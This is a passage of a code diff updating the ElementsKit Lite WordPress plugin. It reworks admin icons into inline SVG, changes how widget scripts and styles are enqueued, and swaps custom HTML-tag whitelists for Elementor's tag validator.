 		'title'     => esc_html__( 'User Settings', 'elementskit-lite' ),
 		'sub-title' => esc_html__( 'Settings for fb, mailchimp etc', 'elementskit-lite' ),
 		'icon'      => 'icon icon-settings1',
+		'svg'       => '<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 40 40" style="enable-background:new 0 0 40 40" xml:space="preserve"><g><g><path d="M15.2,20c0.6,0,1-0.5,1-1s-0.5-1-1-1c-3.8,0-6.8,3-6.8,6.8c0,3.8,3,6.8,6.8,6.8c3.8,0,6.8-3,6.8-6.8c0-0.6-0.5-1-1-1
+		c-0.6,0-1,0.5-1,1c0,2.6-2.1,4.8-4.8,4.8c-2.6,0-4.8-2.1-4.8-4.8C10.4,22.2,12.6,20,15.2,20z"/><path d="M27.9,26.3l-2.1,0.4c-0.4,0.1-0.7,0.4-0.8,0.7c-0.2,0.8-0.6,1.6-1,2.4c-0.2,0.3-0.2,0.8,0,1.1l1.2,1.8
+		c0.2,0.2,0.1,0.6-0.1,0.8l-1.3,1.3c-0.2,0.2-0.5,0.2-0.8,0.1l-1.8-1.2c-0.3-0.2-0.8-0.2-1.1,0c-0.8,0.4-1.6,0.8-2.4,1
+		c-0.4,0.1-0.7,0.4-0.7,0.8l-0.4,2.1c-0.1,0.3-0.3,0.5-0.6,0.5h-1.8c-0.3,0-0.6-0.2-0.6-0.5l-0.4-2.1c-0.1-0.4-0.4-0.7-0.7-0.8
+		c-0.8-0.2-1.6-0.6-2.4-1c-0.3-0.2-0.8-0.2-1.1,0l-1.8,1.2C7.1,35,6.7,35,6.5,34.7l-1.3-1.3C5,33.3,5,32.9,5.2,32.7l1.2-1.8
+		c0.2-0.3,0.2-0.8,0-1.1c-0.4-0.8-0.8-1.6-1-2.4c-0.1-0.4-0.4-0.7-0.8-0.7l-2.1-0.4C2.2,26.3,2,26,2,25.7v-1.8
+		c0-0.3,0.2-0.6,0.5-0.6l2.1-0.4c0.4-0.1,0.7-0.4,0.8-0.7c0.2-0.8,0.6-1.7,1-2.4c0.2-0.3,0.2-0.8,0-1.1l-1.2-1.8
+		C5,16.7,5,16.3,5.3,16.1l1.3-1.3c0.2-0.2,0.5-0.2,0.8-0.1L9.1,16c0.3,0.2,0.8,0.2,1.1,0c0.8-0.4,1.6-0.8,2.4-1
+		c0.4-0.1,0.7-0.4,0.7-0.8l0.4-2.1c0.1-0.6-0.3-1.1-0.8-1.2s-1.1,0.3-1.2,0.8l-0.3,1.5c-0.6,0.2-1.1,0.4-1.7,0.7l-1.3-0.9
+		c-1.1-0.7-2.5-0.6-3.4,0.3l-1.3,1.3c-0.9,0.9-1,2.3-0.3,3.4l0.9,1.3c-0.3,0.5-0.5,1.1-0.7,1.7l-1.5,0.3C0.9,21.5,0,22.6,0,23.9
+		v1.8c0,1.3,0.9,2.4,2.2,2.6l1.5,0.3c0.2,0.6,0.4,1.1,0.7,1.7l-0.9,1.3c-0.7,1.1-0.6,2.5,0.3,3.4l1.3,1.3c0.9,0.9,2.3,1,3.4,0.3
+		l1.2-0.9c0.5,0.3,1.1,0.5,1.7,0.7l0.3,1.5c0.2,1.3,1.3,2.2,2.6,2.2h1.8c1.3,0,2.4-0.9,2.6-2.2l0.3-1.5c0.6-0.2,1.1-0.4,1.7-0.7
+		l1.3,0.9c1.1,0.7,2.5,0.6,3.4-0.3l1.3-1.3c0.9-0.9,1-2.3,0.3-3.4L26,30.3c0.3-0.5,0.5-1.1,0.7-1.7l1.5-0.3
+		c0.6-0.1,0.9-0.6,0.8-1.2C29,26.6,28.4,26.2,27.9,26.3z"/><path d="M38.1,9.2L37,9c-0.1-0.4-0.3-0.8-0.5-1.1L37.2,7c0.6-0.9,0.5-2.2-0.3-3l-1-1c-0.8-0.8-2-0.9-3-0.3l-0.9,0.6
+		C31.7,3.3,31.3,3.1,31,3l-0.2-1.1C30.6,0.8,29.6,0,28.5,0h-1.4C26,0,25,0.8,24.8,1.9L24.6,3c-0.4,0.1-0.8,0.3-1.1,0.5l-0.9-0.6
+		c-0.9-0.6-2.2-0.5-3,0.3l-1,1c-0.8,0.8-0.9,2-0.3,3L19,7.9c-0.2,0.4-0.3,0.7-0.5,1.1l-1.1,0.2c-1.1,0.2-1.9,1.2-1.9,2.3v1.4
+		c0,1.1,0.8,2.1,1.9,2.3l1.1,0.2c0.1,0.4,0.3,0.8,0.5,1.1l-0.6,0.9c-0.6,0.9-0.5,2.2,0.3,3l1,1c0.8,0.8,2,0.9,3,0.3l0.9-0.6
+		c0.4,0.2,0.7,0.3,1.1,0.5l0.2,1.1c0.2,1.1,1.2,1.9,2.3,1.9h1.4c1.1,0,2.1-0.8,2.3-1.9l0.2-1.1c0.4-0.1,0.8-0.3,1.1-0.5l0.9,0.6
+		c0.9,0.6,2.2,0.5,3-0.3l1-1c0.8-0.8,0.9-2,0.3-3l-0.6-0.9c0.2-0.4,0.3-0.7,0.5-1.1l1.1-0.2C39.2,15,40,14,40,12.9v-1.4
+		C40,10.4,39.2,9.4,38.1,9.2z M38,12.9c0,0.1-0.1,0.2-0.2,0.3l-1.7,0.3c-0.4,0.1-0.7,0.4-0.8,0.7c-0.2,0.6-0.4,1.3-0.8,1.8
+		c-0.2,0.3-0.2,0.8,0,1.1l1,1.4c0.1,0.1,0.1,0.3,0,0.4l-1,1c-0.1,0.1-0.2,0.1-0.3,0l-1.4-1c-0.3-0.2-0.8-0.2-1.1,0
+		c-0.6,0.3-1.2,0.6-1.8,0.8c-0.4,0.1-0.7,0.4-0.7,0.8l-0.3,1.7c0,0.1-0.1,0.2-0.3,0.2h-1.4c-0.1,0-0.2-0.1-0.3-0.2l-0.3-1.7
+		c-0.1-0.4-0.4-0.7-0.7-0.8c-0.6-0.2-1.3-0.4-1.8-0.8c-0.3-0.2-0.8-0.2-1.1,0l-1.4,1c-0.1,0.1-0.3,0.1-0.3,0l-1-1
+		c-0.1-0.1-0.1-0.2,0-0.4l1-1.4c0.2-0.3,0.2-0.8,0-1.1c-0.3-0.6-0.6-1.2-0.8-1.8c-0.1-0.4-0.4-0.7-0.8-0.7l-1.7-0.3
+		c-0.1,0-0.2-0.1-0.2-0.3l0-1.4c0-0.1,0.1-0.2,0.2-0.3l1.7-0.3c0.4-0.1,0.7-0.4,0.8-0.7c0.2-0.6,0.4-1.3,0.8-1.8
+		c0.2-0.3,0.2-0.8,0-1.1l-1-1.4c-0.1-0.1-0.1-0.3,0-0.3l1-1c0.1-0.1,0.2-0.1,0.4,0l1.4,1c0.3,0.2,0.8,0.2,1.1,0
+		c0.6-0.3,1.2-0.6,1.8-0.8c0.4-0.1,0.7-0.4,0.7-0.8l0.3-1.7C26.8,2.1,27,2,27.1,2h1.4c0.1,0,0.2,0.1,0.3,0.2l0.3,1.7
+		c0.1,0.4,0.4,0.7,0.7,0.8c0.6,0.2,1.3,0.4,1.8,0.8c0.3,0.2,0.8,0.2,1.1,0l1.4-1c0.1-0.1,0.3-0.1,0.4,0l1,1c0.1,0.1,0.1,0.2,0,0.3
+		l-1,1.4c-0.2,0.3-0.2,0.8,0,1.1c0.3,0.6,0.6,1.2,0.8,1.8c0.1,0.4,0.4,0.7,0.8,0.7l1.7,0.3c0.1,0,0.2,0.1,0.2,0.3V12.9z"/><path d="M27.8,7.3c-2.7,0-4.9,2.2-4.9,4.9c0,2.7,2.2,4.8,4.9,4.9c2.7,0,4.9-2.2,4.9-4.9C32.7,9.5,30.5,7.3,27.8,7.3z M27.8,15
+		c-1.6,0-2.8-1.3-2.8-2.8c0-1.6,1.3-2.8,2.8-2.8v0c1.6,0,2.8,1.3,2.8,2.8S29.4,15,27.8,15z"/></g></g></svg>',
 	),
 );

--- a/elementskit-lite/libs/framework/views/layout-settings.php
+++ b/elementskit-lite/libs/framework/views/layout-settings.php
@@ -22,7 +22,7 @@
 							<span class="ekit-admin-subtitle"><?php echo esc_html( $section['sub-title'] ); ?></span>
 						</div>
 						<div class="ekit-admin-tab-icon">
-							<i class="<?php echo esc_attr( $section['icon'] ); ?>"></i>
+							<?php echo ($section['svg']); ?>
 						</div>
 					</a>
 				</li>
@@ -61,17 +61,20 @@
 				?>
 				<div class="attr-tab-pane <?php echo esc_attr($attr_section_key) ?>" id="v-elementskit-<?php echo esc_attr( $section_key ); ?>" role="tabpanel" aria-labelledby="v-elementskit-tab-<?php echo esc_attr( $section_key ); ?>">
 					<div class="ekit-admin-section-header">
-						<h2 class="ekit-admin-section-heaer-title"><i class="<?php echo esc_attr( $section['icon'] ); ?>"></i><?php echo esc_html( $section['title'] ); ?></h2>
+						<h2 class="ekit-admin-section-heaer-title"><?php echo esc_html( $section['title'] ); ?></h2>
+						<!-- <i class="<?php //echo esc_attr( $section['icon'] ); ?>"></i> -->

 						<?php if ( in_array( $section_key, array( 'widgets', 'modules' ) ) ) : ?>
 							<div class="attr-input attr-input-switch ekit-content-type-free ekit-all-element-switch">
 								<div class="ekit-admin-input-switch attr-card-body">
 									<input checked="" type="checkbox" value="image-accordion" class="ekit-admin-control-input ekit-all-control-input" name="ekit_all_activation_input_widget_<?php echo esc_attr( $section_key ); ?>" id="ekit_all_activation_input_widget_<?php echo esc_attr( $section_key ); ?>">
 									<label class="ekit-admin-control-label" for="ekit_all_activation_input_widget_<?php echo esc_attr( $section_key ); ?>">
-										Disable All
-										<span class="ekit-admin-control-label-switch" data-active="ON"
-											data-inactive="OFF"></span>
-										Enable All
+										<span class="ekit-admin-control-label-wrap">
+											<span class="ekit-admin-control-label-disable attr-disable">Disable All</span>
+											<span class="ekit-admin-control-label-switch" data-active="ON"
+												data-inactive="OFF"></span>
+											<span class="ekit-admin-control-label-enable">Enable All</span>
+										</span>
 									</label>
 								</div>
 							</div>
--- a/elementskit-lite/libs/framework/views/onboard-steps/step-05.php
+++ b/elementskit-lite/libs/framework/views/onboard-steps/step-05.php
@@ -1,6 +1,6 @@
 <div class="ekit-onboard-main-header">
 	<?php
-		$step5_title = __( 'Upgrade within the next </br> <strong>2 hours</strong> and get a <strong>20% Discount.</strong>', 'elementskit-lite' );
+		$step5_title = __( 'Upgrade within the next </br> <strong>2 hours</strong> and get a <strong>35% Discount.</strong>', 'elementskit-lite' );
 	?>
 	<h1 class="ekit-onboard-main-header--title">
 		<?php echo wp_kses( $step5_title, ElementsKit_LiteUtils::get_kses_array() ); ?>
--- a/elementskit-lite/libs/rating/rating.php
+++ b/elementskit-lite/libs/rating/rating.php
@@ -441,7 +441,7 @@

                     });

-                    $('#" . esc_js( $this->text_domain ) . "_btn_deserved').click(function(){
+                    $('#" . esc_js( $this->text_domain ) . "_btn_deserved').on('click', function(){
                         $.ajax({
                             url: ajaxurl,
                             type: 'POST',
@@ -457,7 +457,7 @@
                         });
                     });

-                    $('#" . esc_js( $this->text_domain ) . "_btn_not_good').click(function(){
+                    $('#" . esc_js( $this->text_domain ) . "_btn_not_good').on('click', function(){
                         $.ajax({
                             url: ajaxurl,
                             type: 'POST',
@@ -473,7 +473,7 @@
                         });
                     });

-                    $('#" . esc_js( $this->text_domain ) . "_btn_never_show').click(function(){
+                    $('#" . esc_js( $this->text_domain ) . "_btn_never_show').on('click', function(){
                         $.ajax({
                             url: ajaxurl,
                             type: 'POST',
--- a/elementskit-lite/modules/controls/widget-area-utils.php
+++ b/elementskit-lite/modules/controls/widget-area-utils.php
@@ -57,10 +57,13 @@
 		?>

 		<div class="widgetarea_warper widgetarea_warper_editable" data-elementskit-widgetarea-key="<?php echo esc_attr( $extract_key ); ?>"  data-elementskit-widgetarea-index="<?php echo esc_attr( $tab_id ); ?>">
-			<div class="widgetarea_warper_edit" data-elementskit-widgetarea-key="<?php echo esc_attr( $extract_key ); ?>" data-elementskit-widgetarea-index="<?php echo esc_attr( $tab_id ); ?>">
-				<i class="eicon-edit" aria-hidden="true"></i>
-				<span><?php esc_html_e( 'Edit Content', 'elementskit-lite' ); ?></span>
-			</div>
+
+			<?php if ( ElementorPlugin::$instance->editor->is_edit_mode() ) : ?>
+				<div class="widgetarea_warper_edit" data-elementskit-widgetarea-key="<?php echo esc_attr( $extract_key ); ?>" data-elementskit-widgetarea-index="<?php echo esc_attr( $tab_id ); ?>">
+					<i class="eicon-edit" aria-hidden="true"></i>
+					<span><?php esc_html_e( 'Edit Content', 'elementskit-lite' ); ?></span>
+				</div>
+			<?php endif; ?>

 			<?php
 				$builder_post_title = 'dynamic-content-widget-' . $extract_key . '-' . $tab_id;
--- a/elementskit-lite/modules/elementskit-icon-pack/icon-list.php
+++ b/elementskit-lite/modules/elementskit-icon-pack/icon-list.php
@@ -940,6 +940,15 @@
 	'icon icon-volume-mute'                   	      => 'icon icon-volume-mute',
 	'icon icon-youtube-feed'                   		  => 'icon icon-youtube-feed',
 	'icon icon-interactive-link'					  => 'icon icon-interactive-link',
+	'icon icon-login'					 			  => 'icon icon-login',
+	'icon icon-tiktok-border'					   	  => 'icon icon-tiktok-border',
+	'icon icon-stacked-cards'					   	  => 'icon icon-stacked-cards',
+	'icon icon-smart-post-list'					   	  => 'icon icon-smart-post-list',
+	'icon icon-scroll-reveal'					   	  => 'icon icon-scroll-reveal',
+	'icon icon-scrollable-video'					  => 'icon icon-scrollable-video',
+	'icon icon-register'					   	  	  => 'icon icon-register',
+	'icon icon-marquee-anything'					  => 'icon icon-marquee-anything',
+	'icon icon-copyright'					  		  => 'icon icon-copyright',

 	'fa fa-500px'                                     => 'fa fa-500px',
 	'fa fa-address-book'                              => 'fa fa-address-book',
--- a/elementskit-lite/plugin.php
+++ b/elementskit-lite/plugin.php
@@ -35,9 +35,6 @@
 		// check on-boarding status
 		LibsFrameworkClassesOnboard_Status::instance()->onboard();

-		// Enqueue frontend scripts.
-		add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_frontend' ) );
-
 		// migrate old settings db to new format.
 		new CompatibilityData_MigrationSettings_Db();

@@ -76,7 +73,16 @@
 		// Show forms sub menu page
 		WpmetLibsForms::instance();

-		$is_pro_active = in_array( 'elementskit/elementskit.php', apply_filters( 'active_plugins', get_option( 'active_plugins' ) ) );
+		$is_pro_active = ElementsKit_LiteUtils::ekit_is_plugin_active( 'elementskit/elementskit.php');
+
+		// Initialize editor promotion for pro widgets
+		if( ! $is_pro_active ) {
+			add_action( 'elementor/editor/init', function() {
+				if ( class_exists( 'ElementsKit_LiteCoreEditor_Promotion' ) ) {
+					ElementsKit_LiteCoreEditor_Promotion::instance()->init();
+				}
+			} );
+		}

 		if ( is_admin() && LibsFrameworkClassesUtils::instance()->get_settings( 'ekit_user_consent_for_banner', 'yes' ) == 'yes' ) {
 			$filter_string = ElementsKit_Lite::active_plugins();
@@ -367,18 +373,6 @@
 	}

 	/**
-	 * Enqueue scripts
-	 *
-	 * Enqueue js and css to frontend.
-	 *
-	 * @since 1.0.0
-	 * @access public
-	 */
-	public function enqueue_frontend() {
-		wp_enqueue_script( 'elementskit-framework-js-frontend', ElementsKit_Lite::lib_url() . 'framework/assets/js/frontend-script.js', array( 'jquery' ), ElementsKit_Lite::version(), true );
-	}
-
-	/**
 	 * Enqueue scripts
 	 *
 	 * Enqueue js and css to admin.
--- a/elementskit-lite/widgets/blog-posts/blog-posts.php
+++ b/elementskit-lite/widgets/blog-posts/blog-posts.php
@@ -11,6 +11,16 @@

     public $base;

+	public function get_script_depends() {
+		$deps = [ 'imagesloaded' ];
+
+		if ( Plugin::$instance->editor->is_edit_mode() || Plugin::$instance->preview->is_preview_mode() ) {
+			$deps[] = 'masonry';
+		}
+
+		return $deps;
+	}
+
     public function get_name() {
         return Handler::get_name();
     }
@@ -48,7 +58,6 @@
 	}

     protected function register_controls() {
-
         // Layout
         $this->start_controls_section(
            'ekit_blog_posts_general',
@@ -56,6 +65,7 @@
                'label' => esc_html__( 'Layout', 'elementskit-lite' ),
            ]
        );
+
        $this->add_control(
            'ekit_blog_posts_layout_style',
            [
@@ -83,7 +93,7 @@
                ],
            ]
        );
-
+
         $this->add_control(
             'ekit_blog_posts_layout_style_thumb',
             [
@@ -221,15 +231,33 @@
                'condition' => ['ekit_blog_posts_layout_style!' => 'elementskit-blog-block-post'],
            ]
 	   );
-
+
 			$this->add_control(
 				'grid_masonry',
 				[
 					'label'	=> esc_html__( 'Enable Masonry', 'elementskit-lite' ),
 					'type'	=> Controls_Manager::SWITCHER,
+					'return_value' => 'yes',
 					'condition'	=> [
 						'ekit_blog_posts_layout_style!'	=> 'elementskit-blog-block-post',
-					]
+					],
+					'assets' => [
+						'scripts' => [
+							[
+								'name' => 'masonry',
+								'conditions' => [
+									'terms' => [
+										[
+											'name' => 'grid_masonry',
+											'operator' => '===',
+											'value' => 'yes',
+										],
+									],
+								],
+							],
+						],
+
+					],
 				]
 			);

@@ -521,7 +549,7 @@
                 ],
             ]
         );
-
+

 		$this->end_controls_section();

@@ -637,7 +665,7 @@
                'placeholder' => esc_html__( 'ID', 'elementskit-lite' ),
            ]
        );
-
+
        $this->end_controls_section();


@@ -853,7 +881,7 @@
                 ],
             ]
         );
-
+
         $this->add_group_control(
             Group_Control_Box_Shadow::get_type(),
             [
@@ -961,19 +989,32 @@
            ]
        );

-       $this->add_responsive_control(
+        $this->add_responsive_control(
            'ekit_blog_posts_feature_img_size',
            [
                'label' => esc_html__( 'Image Width', 'elementskit-lite' ),
                'type' => Controls_Manager::SLIDER,
+               'size_units' => [ 'px', '%', 'em', 'rem'],
                'range' => [
-                   'px' => [
-                       'min' => 1,
-                       'max' => 500,
-                   ],
+                    'px' => [
+                        'min' => 1,
+                        'max' => 500,
+                    ],
+                    '%' => [
+                          'min' => 1,
+                          'max' => 100,
+                     ],
+                    'em' => [
+                        'min' => 1,
+                        'max' => 50,
+                    ],
+                    'rem' => [
+                        'min' => 1,
+                        'max' => 50,
+                    ],
                ],
                'selectors' => [
-                   '{{WRAPPER}} .elementskit-entry-thumb' => 'width: {{SIZE}}{{UNIT}}; min-width: {{SIZE}}{{UNIT}}',
+                   '{{WRAPPER}} .elementskit-entry-thumb img' => 'width: {{SIZE}}{{UNIT}};',
                ],
                'condition' => [
                     'ekit_blog_posts_layout_style' => 'elementskit-post-image-card',
@@ -1834,7 +1875,7 @@
             ]
         );

-
+
         $this->add_responsive_control(
             'ekit_blog_posts_floating_category_padding',
             [
@@ -1866,7 +1907,7 @@
                 ],
             ]
         );
-
+
         $this->add_responsive_control(
             'ekit_blog_posts_floating_category_margin_right', [
                 'label'			 =>esc_html__( 'Space Between Categories', 'elementskit-lite' ),
@@ -1892,7 +1933,7 @@
                 ],
             ]
         );
-
+
         $this->end_controls_section();

        // Title Styles
@@ -2780,7 +2821,7 @@
            ]
        );

-
+
        $this->end_controls_section();

        $this->insert_pro_message();
@@ -3109,7 +3150,6 @@

                $(function () {
                    var $postItems = $('#post-items--<?php echo esc_attr( $this->get_id() ); ?>[data-masonry-config]');
-
                    $postItems.imagesLoaded(function () {
                        $postItems.masonry();
                    });
--- a/elementskit-lite/widgets/category-list/category-list-handler.php
+++ b/elementskit-lite/widgets/category-list/category-list-handler.php
@@ -21,7 +21,7 @@
 	}

     static function get_categories() {
-        return [ 'elementskit_headerfooter' ];
+        return [ 'elementskit' ];
 	}

     static function get_dir() {
--- a/elementskit-lite/widgets/countdown-timer/countdown-timer.php
+++ b/elementskit-lite/widgets/countdown-timer/countdown-timer.php
@@ -11,10 +11,13 @@
     use ElementsKit_LiteWidgetsWidget_Notice;

 	public $base;
-
+
     public function __construct( $data = [], $args = null ) {
 		parent::__construct( $data, $args );
-		$this->add_script_depends('final-countdown');
+	}
+
+	public function get_script_depends() {
+		return ['final-countdown'];
 	}

     public function get_name() {
@@ -1752,7 +1755,7 @@
         );

         $this->end_controls_section();
-
+
         $this->insert_pro_message();
     }

--- a/elementskit-lite/widgets/funfact/funfact.php
+++ b/elementskit-lite/widgets/funfact/funfact.php
@@ -15,11 +15,23 @@
 	public $base;

 	public function get_style_depends() {
-		return [ 'odometer' ];
+		$deps = [];
+
+		if ( Plugin::$instance->editor->is_edit_mode() || Plugin::$instance->preview->is_preview_mode() ) {
+			$deps[] = 'odometer';
+		}
+
+		return $deps;
 	}

 	public function get_script_depends() {
-		return ['odometer'];
+		$deps = [];
+
+		if ( Plugin::$instance->editor->is_edit_mode() || Plugin::$instance->preview->is_preview_mode() ) {
+			$deps[] = 'odometer';
+		}
+
+		return $deps;
 	}

 	public function get_name() {
@@ -276,6 +288,36 @@
                     'static'  => esc_html__( 'Static', 'elementskit-lite' ),
                     'sliding'  => esc_html__( 'Sliding', 'elementskit-lite' ),
                 ],
+				'assets' => [
+					'style' => [
+						[
+							'name' => 'odometer',
+							'conditions' => [
+								'terms' => [
+									[
+										'name' => 'ekit_funfact_style',
+										'operator' => '===',
+										'value' => 'sliding',
+									],
+								],
+							],
+						],
+					],
+					'scripts' => [
+						[
+							'name' => 'odometer',
+							'conditions' => [
+								'terms' => [
+									[
+										'name' => 'ekit_funfact_style',
+										'operator' => '===',
+										'value' => 'sliding',
+									],
+								],
+							],
+						],
+					],
+				],
             ]
         );

@@ -796,7 +838,7 @@
 				'tab'   => Controls_Manager::TAB_STYLE,
 			]
 		);
-
+
 		$this->add_responsive_control(
 			'ekit_funfact_text_align',
 			[
@@ -1274,18 +1316,6 @@
 	protected function render_raw() {
 		$settings = $this->get_settings_for_display();

-		$options_ekit_funfact_title_size = array_keys([
-			'h1'   => 'H1',
-			'h2'   => 'H2',
-			'h3'   => 'H3',
-			'h4'   => 'H4',
-			'h5'   => 'H5',
-			'h6'   => 'H6',
-			'div'  => 'div',
-			'span' => 'span',
-			'p'    => 'p',
-		]);
-
 		$text_align = isset($settings['ekit_funfact_text_align']) ? $settings['ekit_funfact_text_align'] : 'center';

 		$hover_border_bottom_direction = '';
@@ -1345,7 +1375,7 @@
 						endif; ?>
 					</div>
 				<?php endif; ?>
-
+
 				<div class="funfact-content">
 					<div class="number-percentage-wraper">
 						<?php echo esc_html( $settings['ekit_funfact_number_prefix'] ); ?>
@@ -1361,7 +1391,7 @@

 					<?php
 						// Validate Title Tag
-						$title_tag = ElementsKit_LiteUtils::esc_options($settings['ekit_funfact_title_size'], $options_ekit_funfact_title_size, 'h3');
+						$title_tag = ElementorUtils::validate_html_tag($settings['ekit_funfact_title_size']);

 						echo '<'. esc_attr($title_tag) .' class="funfact-title">';
 						echo 	esc_html( $settings['ekit_funfact_title_text'] );
--- a/elementskit-lite/widgets/header-info/header-info-handler.php
+++ b/elementskit-lite/widgets/header-info/header-info-handler.php
@@ -20,7 +20,7 @@

     static function get_categories()
     {
-        return ['elementskit_headerfooter'];
+        return ['elementskit'];
     }

     static function get_keywords() {
--- a/elementskit-lite/widgets/header-offcanvas/header-offcanvas-handler.php
+++ b/elementskit-lite/widgets/header-offcanvas/header-offcanvas-handler.php
@@ -20,7 +20,7 @@

     static function get_categories()
     {
-        return ['elementskit_headerfooter'];
+        return ['elementskit'];
     }

     static function get_keywords() {
--- a/elementskit-lite/widgets/header-search/header-search-handler.php
+++ b/elementskit-lite/widgets/header-search/header-search-handler.php
@@ -20,7 +20,7 @@

     static function get_categories()
     {
-        return ['elementskit_headerfooter'];
+        return ['elementskit'];
     }

     static function get_keywords() {
--- a/elementskit-lite/widgets/heading/heading.php
+++ b/elementskit-lite/widgets/heading/heading.php
@@ -1315,33 +1315,8 @@
         $settings = $this->get_settings_for_display();
 		extract($settings);

-		// Sanitize Title & Sub-Title Tags
-		$options_ekit_heading_title_tag = array_keys([
-			'h1' => 'H1',
-			'h2' => 'H2',
-			'h3' => 'H3',
-			'h4' => 'H4',
-			'h5' => 'H5',
-			'h6' => 'H6',
-			'div' => 'div',
-			'span' => 'span',
-			'p' => 'p',
-		]);
-		$title_tag = ElementsKit_LiteUtils::esc_options($ekit_heading_title_tag, $options_ekit_heading_title_tag, 'h2');
-
-		// Sanitize Sub Title Tag
-		$options_ekit_heading_sub_title_tag = array_keys([
-			'h1' => 'H1',
-			'h2' => 'H2',
-			'h3' => 'H3',
-			'h4' => 'H4',
-			'h5' => 'H5',
-			'h6' => 'H6',
-			'div' => 'div',
-			'span' => 'span',
-			'p' => 'p',
-		]);
-		$sub_title_tag = ElementsKit_LiteUtils::esc_options($ekit_heading_sub_title_tag, $options_ekit_heading_sub_title_tag, 'h3');
+		$title_tag = ElementorUtils::validate_html_tag($ekit_heading_title_tag);
+		$sub_title_tag = ElementorUtils::validate_html_tag($ekit_heading_sub_title_tag);

 		// Image sectionn
         $image_html = '';
@@ -1352,7 +1327,6 @@
             $this->add_render_attribute('image', 'title', Control_Media::get_image_title($settings['ekit_heading_seperator_image']));

             $image_html = Group_Control_Image_Size::get_attachment_image_html($settings, 'ekit_heading_seperator_image_size', 'ekit_heading_seperator_image');
-
         }

 		$seperator = '';
--- a/elementskit-lite/widgets/icon-box/icon-box.php
+++ b/elementskit-lite/widgets/icon-box/icon-box.php
@@ -1792,19 +1792,7 @@
         $this->add_render_attribute( 'infobox_wrapper', 'class', $ekit_icon_box_show_image );
         $this->add_render_attribute( 'infobox_wrapper', 'class', $settings['ekit_icon_box_section_bg_hover_color_direction'] );

-		// Title HTML Tag
-		$options_ekit_icon_box_title_size = array_keys([
-			'h1' => 'H1',
-			'h2' => 'H2',
-			'h3' => 'H3',
-			'h4' => 'H4',
-			'h5' => 'H5',
-			'h6' => 'H6',
-			'div' => 'div',
-			'span' => 'span',
-			'p' => 'p',
-		]);
-		$ekit_icon_box_title_size_esc = ElementsKit_LiteUtils::esc_options( $settings['ekit_icon_box_title_size'], $options_ekit_icon_box_title_size, 'h3');
+		$ekit_icon_box_title_size_esc = ElementorUtils::validate_html_tag( $settings['ekit_icon_box_title_size'] );

         // Icon
         $image = '';
--- a/elementskit-lite/widgets/image-box/image-box.php
+++ b/elementskit-lite/widgets/image-box/image-box.php
@@ -1610,8 +1610,9 @@
                     <div class="elementskit-box-content ekit-image-box-body-inner">
                         <?php
                         if ($settings['ekit_image_box_title_text'] != '') :
+                            $ekit_image_box_title_size_esc = ElementorUtils::validate_html_tag( $settings['ekit_image_box_title_size'] );
                         ?>
-                        <<?php echo in_array($settings['ekit_image_box_title_size'], $options_ekit_image_box_title_size) ? esc_attr($settings['ekit_image_box_title_size']) : 'h3'; ?> class="elementskit-info-box-title">
+                        <<?php echo esc_attr($ekit_image_box_title_size_esc); ?> class="elementskit-info-box-title">

                         <?php if(($settings['ekit_image_box_front_title_icons'] != '') && ($settings['ekit_image_box_front_title_icon_position'] == 'left') && ($settings['ekit_image_box_style_simple'] == 'floating-style')) : ?>

@@ -1653,9 +1654,8 @@

                         <?php endif; ?>

-                    </<?php echo in_array($settings['ekit_image_box_title_size'], $options_ekit_image_box_title_size) ? esc_attr($settings['ekit_image_box_title_size']) : 'h3'; ?>>
+                    </<?php echo esc_attr($ekit_image_box_title_size_esc); ?>>
                     <?php
-
                         endif;
                     ?>
                     <?php if ($settings['ekit_image_box_description_text'] != '') { ?>
--- a/elementskit-lite/widgets/init/enqueue-scripts.php
+++ b/elementskit-lite/widgets/init/enqueue-scripts.php
@@ -6,16 +6,16 @@

 class Enqueue_Scripts {

-    public function __construct() {
+	public function __construct() {
+		add_action( 'elementor/frontend/after_register_scripts', [$this, 'register_scripts'] );
+		add_action( 'elementor/frontend/after_enqueue_scripts', [$this, 'enqueue_scripts'] );

-        add_action( 'wp_enqueue_scripts', [$this, 'frontend_js']);
-        add_action( 'wp_enqueue_scripts', [$this, 'frontend_css'], 99 );
+		add_action( 'elementor/frontend/after_register_styles', [$this, 'register_frontend_css'] );
+		add_action( 'elementor/frontend/after_enqueue_styles', [$this, 'enqueue_frontend_css'] );

-        add_action( 'elementor/frontend/before_enqueue_scripts', [$this, 'elementor_js'] );
-        add_action( 'elementor/editor/after_enqueue_styles', [$this, 'elementor_css'] );
-
-        add_action( 'elementor/preview/enqueue_styles', [ $this, 'enqueue_3rd_party_style' ] );
-    }
+		add_action( 'elementor/preview/enqueue_styles', [ $this, 'enqueue_3rd_party_style' ] );
+		add_action( 'elementor/editor/after_enqueue_styles', [$this, 'elementor_editor_css'] );
+	}

 	public function is_plugin_active($plugin) {
 		return in_array( $plugin, (array) get_option( 'active_plugins', array() ), true ) || $this->is_plugin_active_for_network( $plugin );
@@ -34,89 +34,119 @@
 		return false;
 	}

-    public function elementor_js() {
-        // Register Scripts
-        // size : 814 biyets ** used for back to top button circle progress bar
-        wp_register_script( 'animate-circle', ElementsKit_Lite::widget_url() . 'init/assets/js/animate-circle.min.js', [], ElementsKit_Lite::version(), true );
-
-        // Enqueue Scripts
-        wp_enqueue_script( 'elementskit-elementor', ElementsKit_Lite::widget_url() . 'init/assets/js/elementor.js', ['jquery', 'elementor-frontend', 'animate-circle'], ElementsKit_Lite::version(), true );
-        wp_localize_script( 'elementskit-elementor', 'ekit_config', [
-            'ajaxurl'   => admin_url( 'admin-ajax.php' ),
-            'nonce'     => wp_create_nonce( 'ekit_pro' ),
-        ] );
-
-        // compatibility
-        if($this->is_plugin_active('elementskit/elementskit.php') && version_compare(Elementskit::version(), '3.2.0', '<=')) {
-            // added swiper js - elementor remove it when "Improved Asset Loading" is active
-            if(defined('ELEMENTOR_ASSETS_URL')) {
-                wp_enqueue_script(
-                    'swiper',
-                    ELEMENTOR_ASSETS_URL . 'lib/swiper/swiper.min.js',
-                    [],
-                    ElementsKit_Lite::version(),
-                    true
-                );
-            }
-        }
-
-        // added fluent form styles on the editor
-        if (in_array('fluentform/fluentform.php', apply_filters('active_plugins', get_option('active_plugins')))) {
-            wp_enqueue_style( 'fluent-form-styles' );
-            wp_enqueue_style( 'fluentform-public-default' );
-        }
+	public function register_scripts() {
+		if( is_admin() ) {
+			return;
+		}
+
+		// register script for gallery, video gallery
